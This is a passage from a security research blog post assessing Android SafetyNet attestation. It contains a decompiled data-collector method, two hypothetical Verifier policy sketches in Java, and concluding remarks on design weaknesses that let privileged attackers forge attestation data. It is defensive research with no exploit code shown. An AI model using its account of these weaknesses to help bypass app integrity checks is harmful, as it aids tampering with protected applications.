11: public final aebz collect(String arg7) {

12: int v1 = 0;

13: aebz v0 = new aebz();

14: try {

15: v0.apkDigest = aecg.a(new File(this.b.getApplicationInfo(arg7, 0).sourceDir));

16: v0.installerPkgName = this.b.getInstallerPackageName(arg7);

17: v0.d = this.b.getPackageInfo(arg7, 0).sharedUserId;

18: Signature[] v2 = this.b.getPackageInfo(arg7, 0x40).signatures;

19: v0.certDigests = new byte[v2.length][];

20: MessageDigest v3 = MessageDigest.getInstance("SHA-256");

21: while(true) {

22: if(v1 >= v2.length) {

23: return v0;

24: }

25:

26: v0.certDigests[v1] = v3.digest(v2[v1].toByteArray());

27: ++v1;

28: }

29: }

Providing the installer package name as part of the signed attestation response would have been a major step towards enabling developers to track unauthorized installers and application stores. The Verifier component would then have trusted data to process when deciding whether the installation source is considered trusted (e.g. only installed from Google Play Store - "com.android.vending").
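If such a field were ever added to the signed response, the Verifier policy could be as simple as an allow-list. The sketch below is purely hypothetical, since no installer field exists in the attestation response today. It treats a missing installer (as reported for sideloaded packages) as untrusted.

```java
import java.util.Arrays;
import java.util.Collections;
import java.util.HashSet;
import java.util.Set;

final class InstallerPolicy {
    // Installers the vendor is willing to accept (assumed policy).
    static final Set<String> TRUSTED_INSTALLERS =
            Collections.unmodifiableSet(new HashSet<>(Arrays.asList("com.android.vending")));

    // A null installer name means the package was not installed by a store app.
    static boolean isTrustedInstaller(String installerPackageName) {
        return installerPackageName != null
                && TRUSTED_INSTALLERS.contains(installerPackageName);
    }
}
```

The same check performed on a value reported by the app itself would carry no weight, since that value can be overridden with the hooks shown earlier.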

Concluding Remarks

Regarding the overall protection value of SafetyNet attestation, our research has concluded that the SafetyNet implementation does not yet use a strong hardware-level key attestation mechanism. Without the hardware keymaster attestation extensions, the (user-space) device profiling mechanism is vulnerable to tampering by adversaries that have obtained elevated privileges. Considering the fast evolution of the SafetyNet API in the past year, we believe that Google's efforts are heading in the right direction and that Android devices will eventually benefit from the newly introduced hardware-backed remote attestation mechanism. Unfortunately, Play Services (and thus SafetyNet) has to remain compatible with older and outdated setups too, so there is still a lot of ground to cover for devices that are bound to have limited capabilities.

As for the application integrity implementations that are based on the SafetyNet Attestation API, our research has verified that they provide limited protection (only against pre-installation attacks) and are strongly coupled with device integrity checks. If the latter are compromised, the collected application information cannot be trusted and thus the entire integrity control chain is defenseless. Furthermore, we have identified various deficiencies in the SafetyNet implementation which can be used to attack its components and tamper with the Collector data. The identified attack paths are mainly classified as targeted and local, although the weak design of the SafetyNet stack technically allows automated attacks from malware that has escalated privileges on the device. However, considering the adoption rate of the SafetyNet API and the value of the targets that currently use it, we do not believe that this is likely to be exploited very soon.
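The coupling between the two kinds of checks can be made explicit in the Verifier. The sketch below assumes that the JWS signature, nonce and timestamp of the attestation response have already been validated, and that the payload has been decoded into the fields shown (`apkPackageName`, `apkDigestSha256`, `apkCertificateDigestSha256`, `ctsProfileMatch`, `basicIntegrity`). The class names and the policy itself are our own assumptions, not a recommended or official implementation.

```java
import java.util.List;
import java.util.Objects;

// Hypothetical Verifier policy: application fields are only considered
// once the device integrity verdicts have passed.
final class AttestationPolicy {

    // Subset of the decoded attestation payload (signature verified elsewhere).
    static final class Payload {
        final String apkPackageName;
        final String apkDigestSha256;
        final List<String> apkCertificateDigestSha256;
        final boolean ctsProfileMatch;
        final boolean basicIntegrity;

        Payload(String apkPackageName, String apkDigestSha256,
                List<String> apkCertificateDigestSha256,
                boolean ctsProfileMatch, boolean basicIntegrity) {
            this.apkPackageName = apkPackageName;
            this.apkDigestSha256 = apkDigestSha256;
            this.apkCertificateDigestSha256 = apkCertificateDigestSha256;
            this.ctsProfileMatch = ctsProfileMatch;
            this.basicIntegrity = basicIntegrity;
        }
    }

    // Values the backend expects for one specific app release.
    static final class ExpectedApp {
        final String packageName;
        final String apkDigest;
        final List<String> certDigests;

        ExpectedApp(String packageName, String apkDigest, List<String> certDigests) {
            this.packageName = Objects.requireNonNull(packageName);
            this.apkDigest = Objects.requireNonNull(apkDigest);
            this.certDigests = Objects.requireNonNull(certDigests);
        }
    }

    static boolean isAppTrusted(Payload p, ExpectedApp e) {
        // Application data was collected on the device itself, so it is
        // meaningless if the device integrity verdicts fail.
        if (!p.basicIntegrity || !p.ctsProfileMatch) {
            return false;
        }
        return e.packageName.equals(p.apkPackageName)
                && e.apkDigest.equals(p.apkDigestSha256)
                && e.certDigests.equals(p.apkCertificateDigestSha256);
    }
}
```

Note that passing this check only shows that the reported values match. As discussed above, an attacker who defeats the device integrity checks can also forge the application fields.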

For many mobile application threat models, the "single point of failure" design and the specific design weaknesses identified in this post are not considered an accepted risk. More mature, but usually non-free, application integrity solutions deploy a network of integrity controls across the application code, requiring an attacker to bypass the entire network rather than individual checkpoints. The generated network is also unique per app release. This increases the time and effort required for an attacker to tamper with an app. With SafetyNet, in contrast, an attacker would need only a simpler attack strategy against a single API to successfully circumvent all SafetyNet-protected applications and their relevant releases.

However, some threat models might consider the current SafetyNet weaknesses an accepted risk, and the teams behind them may thus want to proceed with adopting it for device and application integrity controls. Before proceeding with the implementation phase, it is essential that product security teams understand the SafetyNet capabilities and limitations, and come up with workarounds for the Requester Verification problem that remain compatible with their security requirements. Additional effort and protocol changes may be required (beyond the ones described in this article) if the application is using a completely stateless API to bind attestation information with mobile clients.

If you have any questions (technical or otherwise) about the research presented in this article, feel free to contact us.

Acknowledgements

- Ioannis Stais for assisting in the evaluation of the impact and ease of exploitation of the identified attack strategies

- George Poulios for helping with the development of the sample applications and Verifier backend implementation

- Dimitris Glynos for the mobile threat modeling feedback and help reviewing the article

- The rest of the CENSUS team for bouncing ideas around during the research

References

- Google: SafetyNet Attestation API

- Google: SafetyNet attestation, a building block for anti-abuse

- Google: 10 things you might be doing wrong when using the SafetyNet Attestation API

- Synopsys: Using the SafetyNet API

- John Kozyrakis: Inside SafetyNet

- Collin R. Mulliner: Inside Android’s SafetyNet Attestation: Attack and Defense

- John Wu: Magisk - Hiding from SafetyNet

- OWASP: Architectural Principles That Prevent Code Modification

Android is a trademark of Google Inc.

Google Play is a trademark of Google Inc.